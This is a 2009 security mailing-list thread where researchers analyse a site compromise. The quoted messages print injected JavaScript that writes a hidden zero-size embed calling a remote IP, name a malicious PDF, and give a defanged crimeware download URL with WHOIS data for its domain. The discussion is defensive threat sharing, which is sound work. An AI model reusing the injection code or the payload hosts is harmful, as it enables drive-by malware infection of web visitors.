On Mon, Apr 20, 2009 at 10:42 AM, Jake Mailinglists <[email protected]>wrote:
> Paul, > I noticed that in the PDF file but as the domain doesn't seem to have > resolution I didn't mention it. > > Jake > > WHOIS information on the domain > > Whois Record > > domain: TEST1.RU > type: CORPORATE > nserver: ns1.centerhost.ru. > nserver: ns1.cetis.ru. > state: REGISTERED, DELEGATED > org: Center of Effective Technologies and Systems CETIS > phone: +7 4957711654 > fax-no: +7 4957879251 > e-mail: > <http://www.domaintools.com/registrant-search/?email=f6261250d87c80094b7a5eb64d324e5a> > e-mail: > <http://www.domaintools.com/registrant-search/?email=acac76ec2f649d85219bdf7879b125ff> > registrar: REGRU-REG-RIPN > created: 2001.03.30 > paid-till: 2010.04.03 > source: TC-RIPN > > Registry Data Created: 2001-03-30 Expires: 2010-04-03 Whois Server: > whois.ripn.net > Server Data Domain Status: Registered And No Website > > > On Fri, Apr 17, 2009 at 9:06 PM, Paul Ferguson <[email protected]>wrote: > >> -----BEGIN PGP SIGNED MESSAGE----- >> Hash: SHA1 >> >> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <[email protected]> >> wrote: >> >> >> >> I took a quick look at the code... formatted it in a pastebin here: >> >> http://pastebin.com/m7b50be54 >> >> >> >> That javascript writes this to the page (URL obscured): >> >> document.write("<embed >> >> src=\"hXXp:// >> 77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|<http://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown%7C> >> >> U nknown|US|1.2.3.4\" width=\"0\" height=\"0\" >> >> type=\"application/pdf\"></embed>"); >> >> >> >> The 1.2.3.4 in the URL is my public IP address (I changed that). >> >> >> >> Below the javascript, it grabs a PDF: >> >> <embed src="include/two.pdf" width="1" height="0" >> >> style="border:none"></embed> >> >> >> >> That PDF is on the site, I haven't looked at it yet though. >> >> >> >> Not only is that .pdf malicious, when "executed" it also fetches >> additional >> malware from: >> >> hxxp:// test1.ru /1.1.1/load.php >> >> If that host is not in your block list, it should be -- known purveyor of >> crimeware. >> >> This is in addition to the other malicious URLs mentioned in this thread. >> >> - - ferg >> >> -----BEGIN PGP SIGNATURE----- >> Version: PGP Desktop 9.5.3 (Build 5003) >> >> wj8DBQFJ6Seaq1pz9mNUZTMRAsePAJ4ltJybvyViJoiTJDbIN9JCMjbZtgCgtOnI >> mxM8Ci/feKnJe6M6qbiESPw= >> =b0Yj >> -----END PGP SIGNATURE----- >> >> >> >> -- >> "Fergie", a.k.a. Paul Ferguson >> Engineering Architecture for the Internet >> fergdawgster(at)gmail.com >> ferg's tech blog: http://fergdawg.blogspot.com/ >> >> >
